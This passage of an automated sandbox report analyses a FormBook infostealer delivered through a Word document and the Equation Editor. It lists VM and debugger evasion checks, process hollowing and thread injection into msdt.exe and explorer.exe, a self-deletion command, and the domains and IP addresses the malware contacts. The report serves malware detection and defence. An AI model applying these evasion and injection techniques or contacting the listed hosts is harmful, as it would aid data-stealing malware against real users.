Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: medicomsh78694.exe PID: 2824, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msdt.exe RDTSC instruction interceptor: First address: 0000000000088614 second address: 000000000008861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msdt.exe RDTSC instruction interceptor: First address: 00000000000889AE second address: 00000000000889B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2552 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe TID: 2032 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\msdt.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_004088E0 rdtsc 5_2_004088E0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.514374619.000000000457A000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp Binary or memory string: vmware
Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000006.00000000.514374619.000000000457A000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: explorer.exe, 00000006.00000000.514300664.00000000044E7000.00000004.00000001.sdmp Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000006.00000000.425259363.000000000029B000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: explorer.exe, 00000006.00000000.514860954.00000000045D6000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

Anti Debugging:

barindex
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_004088E0 rdtsc 5_2_004088E0
Enables debug privileges
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BC26F8 mov eax, dword ptr fs:[00000030h] 5_2_00BC26F8
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_026026F8 mov eax, dword ptr fs:[00000030h] 7_2_026026F8
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00409B50 LdrLoadDll, 5_2_00409B50
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.muzicalbox.com
Source: C:\Windows\explorer.exe Network Connect: 23.227.38.74 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 91.195.240.13 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.extraordinarymiracle.com
Source: C:\Windows\explorer.exe Domain query: www.realstakepool.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 109.94.209.123 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.prestigiousuniforms.com
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Section unmapped: C:\Windows\SysWOW64\msdt.exe base address: C40000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Memory written: C:\Users\user\AppData\Roaming\medicomsh78694.exe base: 400000 value starts with: 4D5A Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Thread register set: target process: 1764 Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Thread register set: target process: 1764 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\medicomsh78694.exe C:\Users\user\AppData\Roaming\medicomsh78694.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Process created: C:\Users\user\AppData\Roaming\medicomsh78694.exe {path} Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\medicomsh78694.exe" Jump to behavior
Source: explorer.exe, 00000006.00000000.445207583.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.435031021.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.425787862.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.512334695.0000000000750000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.433735191.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.444882929.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmp Binary or memory string: ProgmanG
Source: explorer.exe, 00000006.00000000.445207583.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.435031021.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.425787862.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.512334695.0000000000750000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: explorer.exe, 00000006.00000000.445207583.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.435031021.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.425787862.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.512334695.0000000000750000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Queries volume information: C:\Users\user\AppData\Roaming\medicomsh78694.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 4.2.medicomsh78694.exe.3221198.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.medicomsh78694.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.medicomsh78694.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.medicomsh78694.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 4.2.medicomsh78694.exe.3221198.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.medicomsh78694.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.medicomsh78694.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.medicomsh78694.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, type: MEMORY
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs